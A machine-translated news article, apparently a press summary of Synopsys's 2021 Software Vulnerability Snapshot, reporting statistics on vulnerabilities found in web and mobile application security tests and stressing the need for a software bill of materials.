The latest report of Xinsi technology shows that 97% of applications have vulnerabilities

In the digital economy , Software is the main way for most enterprises to interact with customers and provide customer support . If the software sold by the enterprise or the product containing embedded software has software security that affects the use of the product 、 Compliance or quality issues , Will bring unbearable impact to the enterprise . Even enterprises that are not directly involved in the sales of software or software driven products , It will also be affected by software quality and safety problems . for example , Most paychecks 、 bill 、 Accounts receivable 、 The management system for sales tracking and customer records is software driven . Software controlled production 、 Manage inventory 、 Direct warehousing activities 、 And running a distribution system to ensure normal business operation . therefore , The understanding of software security and application security testing should be more comprehensive .

 

(Synopsys, Inc.,Nasdaq: SNPS) Recently released

（2021 Software Vulnerability Snapshot: An Analysis by Synopsys Application Security Testing Services,  Hereinafter referred to as the report ）. The report analyzes 2020 Years of 2,600 Goals （ Software or system ） On going 3,900 Data from this test . These data are compiled from the tests conducted by Xinsi technology security consultants for customers in the evaluation center , Including penetration testing 、 Dynamic application security testing and mobile application security analysis , Simulate the behavior of attackers in the real world to test running applications .

 

among 83% The goal of the test is Web application ,12% It's a mobile app , The rest are source code or network systems / application . The industries tested include software and the Internet 、 financial service 、 Business services 、 manufacturing 、 The media and entertainment industries and the medical and health industries .

 

Vice president of security consultant of software quality and Security Department of Xinsi technology Girish Janardhanudu Express ：“ Now? , Cloud based deployment 、 The modern technology framework and the fast delivery speed are forcing the security department to make a faster response . Because in the market AppSec Insufficient resources , Enterprises are using the application security testing services provided by Xinsi technology , In order to flexibly expand its security testing . We've seen , During the outbreak , The demand for security assessment has increased significantly .”

 

stay 3,900 In this test ,97% The tested target of is found to have some form of vulnerability ; among 30% The target is a high-risk vulnerability ;6% Is a serious risk vulnerability . It turns out that , The best way of security testing is to use widely available tools to help ensure that the application or system is free of vulnerabilities . for example ,28% The test target has suffered from cross site scripting (XSS) attack . This is the impact web The most common and destructive high / One of the key risk vulnerabilities . many XSS The vulnerability only occurs when the application is running .

 

Other highlights of the report ：

 

•       

stay 76% Of the tested targets 2021 year OWASP Top 10 A loophole in the .

Application and server configuration errors account for... Of all vulnerabilities found in the test 21%, The representative ones are OWASP A05:2021 –  Security configuration error category . in addition , Among the total vulnerabilities found are 19% And OWASP A01:2021 –  Access control failure category .

 

•       

Insecure data storage and communication vulnerabilities plague mobile applications .

Among the vulnerabilities found in mobile testing , Yes 80% Related to unsafe data storage . These vulnerabilities allow attackers to physically （ I.e. access to stolen devices ） Or malware accessing mobile devices . There are also vulnerabilities found in mobile testing 53% Related to unsafe means of communication .

 

•       

Even low-risk vulnerabilities can be exploited to facilitate attacks .

Found by test , among 64% The vulnerability is considered low 、 Low or medium risk . in other words , An attacker cannot directly exploit the discovered vulnerability to access the system or sensitive data . For all that , It is not useless to find out these loopholes , Because even low-risk vulnerabilities can be exploited to facilitate attacks . for example , During the test, it was found that 49% The server banner can provide the server name in detail 、 Information such as type and version number , It may help attackers launch targeted attacks against specific technology stacks .

 

•       

The urgent need for software bill of materials .

It is worth noting that , In the penetration test conducted by Xinsi technology application security testing service , I found out there was 18% Our system is using vulnerable third-party libraries . This is related to 2021 year OWASP TOP10 In the hole A06:2021 –  Vulnerable and obsolete component categories are consistent . Most organizations tend to mix proprietary code 、 Commercial off the shelf code and open source components to develop software for external sales or internal use . Usually , These enterprises only use informal lists or even no lists , To document which components are being used by their software , And the licenses for these components 、 Version and patch status . Because many enterprises are using hundreds of applications or software systems , There may be hundreds to thousands of different third-party and open source components , Therefore, there is an urgent need for an accurate and up-to-date software bill of materials （SBOM） To effectively track these components .